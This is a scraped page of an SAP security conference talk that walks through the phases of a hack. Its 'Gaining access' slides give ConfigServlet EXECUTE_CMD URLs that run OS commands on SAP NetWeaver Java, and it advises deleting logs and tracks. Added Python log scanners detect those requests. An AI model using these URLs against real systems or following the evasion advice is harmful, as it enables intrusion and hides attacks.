SYTYCH#16
So You Think You Can Hack
• Company specialised in securing SAP systems and infrastructures
• SAP Security consulting
• Regular presenters on SAP Security in Security conferences
• Research: In worldwide top 5 for found SAP Security vulnerabilities
• Developer of Protect4S - Security Analyser for SAP™
• SAP Development Partner
• Our mission is to raise the security of mission–critical SAP platforms with
minimal impact on day–to–day business.
Joris van de Vis, Fred van de Langenberg, Robin Vleeschhouwer
ERP Security
Let’s do something unique
Collective hack = Grouphack ≠ Grouphug
What are we going to do…
Hack a SAP system collectively
But wait…
Isn’t that illegal?
Yes (in many cases) it is. Hence the disclaimer:
Hacking is illegal and very naughty. This presentation is not aiming to stimulate or approve
hacking. This presentation is meant for academic and educational purposes only.
Find the Get-out-of-jail-free card here:
I herewith approve all participants of SitNL#16
to hack my SAP system on host XXX
Only on November 26 2016.
<TIP>During this presentation QR codes will be
shown to simplify calling long URLs.
You might want to consider installing an app
on your mobile phone called a QR code
scanner to avoid typing really long URLs.
</TIP>
Handy…
Anatomy of a hack…
We will go through some common steps of a hack / penetration test
Step 1 – Reconnaissance
Gathering of data about the target.
Step 2 – Scanning / enumeration
Scan the perimeter internally and externally for vulnerabilities.
Step 3 – Gain access
Use the gathered info retrieved from previous steps to gain access to the target.
Step 4 – Keep access / go further
To successfully perform an attack, access must be maintained over a certain period of time. Further
penetration of the target might also be needed to reach the target's crown jewels.
Step 5 – Delete tracks
Be cautious, don't get noticed or caught. Make sure to delete your tracks: logs, tooling, created users, etc.
Step 1: Reconnaissance
Step 1 - Reconnaissance
Try to gather as much information as possible on the business and way of working of the
target. Find information like how they operate, the type of systems used, procedures, IP
ranges, domain names, mail servers, DNS, etc.
Tooling: social media (Facebook, LinkedIn), Google and, for example, Shodan and Censys
http://whois.domaintools.com/erp-sec.com
https://www.shodan.io/search?query=sap+netweaver
Step 1: Reconnaissance
Step 2: Scanning
Step 2 – Scanning / enumeration
Scan the environment internally and externally to get a clear image of the target.
Scanning is done to find open ports and, hopefully, vulnerable services behind them.
Scanning is most often done at network level: think of port scans, scans for specific
services, firewall scans, scans to detect the operating system version, etc.
Tooling: network scanners and other scanning tools like NMAP, responder.py, network
sniffing tools like Wireshark, keyloggers, etc. (Really too many to name.)
Step 2: Scanning
Step 2 – Scanning / enumeration
https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?
Step 2: Scanning
Step 3: Gaining access
Step 3 – Gaining access
Try to gain access to one or more systems using the information gathered before. From there,
extract valuable information or further penetrate the landscape.
Tooling: create your own, or use exploitation tools to exploit vulnerabilities via SQL
injection, XSS, CSRF, RCE, directory traversal, code injection, verb tampering, etc. Again,
too many to name. Use social engineering to hack the human.
http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls
http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
Step 3: Gaining access
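The two ConfigServlet URLs above show the pattern a defender can watch for in the HTTP access logs of a reverse proxy or web server in front of an SAP Java stack: the servlet path combined with an EXECUTE_CMD action inside the param value. The following is an added example for this page, not code from the presentation or from ERP Security. It parses constructed Common Log Format lines, percent-decodes the request (including double-encoded payloads) and classifies each hit; the log layout and the field names in the finding are assumptions.

```python
"""Flag requests to the SAP NetWeaver Java CTC ConfigServlet in HTTP access logs.

Added example for this page, not code from the presentation or from ERP Security.
The log lines below are constructed; the Common Log Format layout is an assumption
about how the reverse proxy or web server in front of the SAP Java stack logs requests.
"""
import re
from urllib.parse import unquote, urlsplit

# Servlet path shown on the slide; regular portal users never call it, so any
# request to it deserves a look.
CTC_PATH = "/ctc/servlet/com.sap.ctc.util.ConfigServlet"

# Common Log Format: client ident user [time] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads (%2520 -> %20 -> ' ')
    are normalised before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a query string on '&' only. urllib's parse_qsl also split on ';' in
    older Python versions, which would break the ';'-separated 'param' value."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[fully_decode(key)] = fully_decode(value)
    return params


def analyse_line(line):
    """Return a finding dict for a ConfigServlet request, or None for anything else."""
    match = LOG_RE.match(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not fully_decode(parts.path).lower().startswith(CTC_PATH.lower()):
        return None
    # The servlet's 'param' value has the shape 'class;action;arg1;arg2;...'
    fields = parse_query(parts.query).get("param", "").split(";")
    finding = {
        "client": match.group("client"),
        "time": match.group("time"),
        "status": int(match.group("status")),
        "config_class": fields[0] or None,
        "action": fields[1] if len(fields) > 1 else None,
        "arguments": fields[2:],
        "severity": "warning",  # any hit on the servlet is unexpected traffic
    }
    if finding["action"] == "EXECUTE_CMD":
        finding["severity"] = "critical"  # OS command execution attempt
    return finding


def scan_log(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [f for f in map(analyse_line, lines) if f is not None]


# Constructed sample log: two lines mirror the URLs from the slide, one is normal
# portal traffic, one is a bare probe of the servlet that was refused.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Nov/2016:14:02:11 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet'
    '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Nov/2016:14:02:15 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet'
    '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt HTTP/1.1" 200 1024',
    '198.51.100.4 - - [26/Nov/2016:14:03:00 +0100] "GET /irj/portal HTTP/1.1" 200 8120',
    '203.0.113.9 - - [26/Nov/2016:14:05:42 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["severity"]:8} {finding["client"]:14} {finding["status"]} '
              f'{finding["action"]} {" ".join(finding["arguments"])}')
```

A 200 response on a critical finding means the command most likely ran and the host should be treated as compromised; a 401 or 403 on a warning finding still tells you someone is probing the interface. Matching on the decoded path rather than the raw request line is what keeps percent-encoded or double-encoded variants from slipping past the check.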
Towards solutions
- There is no silver bullet solution
- SAP (Platform) security goes beyond team boundaries. Involve:
- SAP Basis team
- SAP Authorisations team
- Database team
- Operating system team
- Network team
- Involve management, not a pure technical party
- Create a security process instead of a one-time project
- You might consider using tooling to support this process.
Demo Protect4S
Questions?
For more information please visit https://www.erp-sec.com
SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as
well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and
other countries.
All other product and service names mentioned are the trademarks of their respective companies.
Data contained in this document serves informational purposes only.
The authors assume no responsibility for errors or omissions in this document. The authors do not
warrant the accuracy or completeness of the information, text, graphics, links, or other items
contained within this material. This document is provided without a warranty of any kind, either
express or implied, including but not limited to the implied warranties of merchantability, fitness for a
particular purpose, or non-infringement.
The authors shall have no liability for damages of any kind including without limitation direct, special,
indirect, or consequential damages that may result from the use of this document.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its
content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
No part of this document may be reproduced without the prior written permission of ERP Security BV.
© 2013 ERP Security BV.
Disclaimer
So You Think You Can Hack | sitNL 2016

The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
 
EUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersEUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exporters
 
Cyber Security Training in Office Environment
Cyber Security Training in Office EnvironmentCyber Security Training in Office Environment
Cyber Security Training in Office Environment
 
WAM Corporate Presentation April 12 2024.pdf
WAM Corporate Presentation April 12 2024.pdfWAM Corporate Presentation April 12 2024.pdf
WAM Corporate Presentation April 12 2024.pdf
 
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
 
NAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors DataNAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors Data
 
Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...
 
Excvation Safety for safety officers reference
Excvation Safety for safety officers referenceExcvation Safety for safety officers reference
Excvation Safety for safety officers reference
 
Interoperability and ecosystems: Assembling the industrial metaverse
Interoperability and ecosystems:  Assembling the industrial metaverseInteroperability and ecosystems:  Assembling the industrial metaverse
Interoperability and ecosystems: Assembling the industrial metaverse
 
business environment micro environment macro environment.pptx
business environment micro environment macro environment.pptxbusiness environment micro environment macro environment.pptx
business environment micro environment macro environment.pptx
 
Healthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare NewsletterHealthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare Newsletter
 
Technical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamTechnical Leaders - Working with the Management Team
Technical Leaders - Working with the Management Team
 
Data Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and TemplatesData Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and Templates
 
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
 
20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdf20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdf
 
Pitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deckPitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deck
 
TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024
 
Unveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic ExperiencesUnveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic Experiences
 
Psychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh JiPsychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh Ji
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf
 

So You Think You Can Hack | sitNL 2016

  • 8. Step 1: Reconnaissance
Step 1 - Reconnaissance
Try to gather as much information as possible on the business and the way of working of the target. Find information like how they operate, the type of systems used, procedures, IP range, domain names, mail servers, DNS, etc.
Tooling: social media (Facebook, LinkedIn), Google and, for example, Shodan and Censys
http://whois.domaintools.com/erp-sec.com
https://www.shodan.io/search?query=sap+netweaver
  • 10. Step 2: Scanning
Step 2 – Scanning / enumeration
Scan the environment internally and externally to get a clear image of the target. Scanning is done to find open ports with, hopefully, vulnerable services behind them.
Scanning is most often done on network level: think of port scans, scans for specific services, firewall scans, scans to detect the Operating System version, etc.
Tooling: network scanning and other scanning tools like NMAP, responder.py, network sniffing tools like Wireshark, keyloggers, etc. (really too many to name)
  • 11. Step 2: Scanning
Step 2 – Scanning / enumeration
https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?
  • 13. Step 3: Gaining access
Step 3 – Gaining access
Try to gain access to 1 or more systems using the information gathered before. From there, extract valuable information or further penetrate the landscape.
Tooling: Create your own, or use exploitation tools to exploit vulnerabilities via SQL injection, XSS, CSRF, RCE, directory traversal, code injection, verb tampering, etc. Again, too many to name. Use social engineering to hack the human.
http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls
http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
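The defender's side of the ConfigServlet request shown on this slide, added here as an example that is not part of the original presentation: it parses constructed common-log-format access lines and flags any request that calls the ConfigServlet with an `EXECUTE_CMD` action, so the pattern can be hunted for in web server or reverse proxy logs. That the logs in front of port 50000 have this shape is an assumption.

```python
"""Flag requests that call the SAP NetWeaver Java ConfigServlet with EXECUTE_CMD
(the request pattern shown on the 'Gaining access' slide). Added detection example,
not from the original presentation; the common-log-format lines are constructed."""
import re
from urllib.parse import unquote, urlsplit

CONFIG_SERVLET = "/ctc/servlet/com.sap.ctc.util.ConfigServlet"
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample access log, not taken from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Nov/2016:10:01:02 +0100] "GET /irj/portal HTTP/1.1" 200 5120
10.0.0.9 - - [26/Nov/2016:10:01:07 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls HTTP/1.1" 200 412
10.0.0.9 - - [26/Nov/2016:10:01:09 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt HTTP/1.1" 200 88
10.0.0.7 - - [26/Nov/2016:10:02:00 +0100] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig HTTP/1.1" 403 0
"""

def raw_query_params(query):
    """Split on '&' only, values undecoded; parse_qs() before Python 3.9.2 also splits on ';'."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote(key)] = value
    return params

def analyse_request(target):
    """Return {'config_class', 'cmdline'} for a ConfigServlet EXECUTE_CMD request, else None."""
    parts = urlsplit(target)
    if parts.path.lower() != CONFIG_SERVLET.lower():
        return None
    # Split on ';' before decoding so an encoded ';' (%3B) inside CMDLINE stays intact.
    fields = [unquote(f) for f in raw_query_params(parts.query).get("param", "").split(";")]
    if "EXECUTE_CMD" not in fields:
        return None
    cmd = next((f[len("CMDLINE="):] for f in fields if f.startswith("CMDLINE=")), "")
    return {"config_class": fields[0], "cmdline": cmd}

def scan_log(text):
    """One finding per log line whose request analyse_request() flags."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hit = analyse_request(m.group("target")) if m else None
        if hit:
            findings.append({"src": m.group("src"), "status": int(m.group("status")), **hit})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 403 on the same path without `EXECUTE_CMD` is deliberately not flagged, so the output lists only the two command execution attempts and the client address that made them.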
  • 14. Step 3: Gaining access
  • 15. Towards solutions
- There is no silver bullet solution
- SAP (Platform) security goes beyond team boundaries. Involve:
  - SAP Basis team
  - SAP Authorisations team
  - Database team
  - Operating system team
  - Network team
- Involve management, not only a purely technical party
- Create a Security process, instead of a one-time project
- You might consider using tooling to support this process.
  • 17. Questions?
For more information please visit https://www.erp-sec.com
  • 18. Disclaimer
SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries. All other product and service names mentioned are the trademarks of their respective companies.
Data contained in this document serves informational purposes only. The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement. The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV.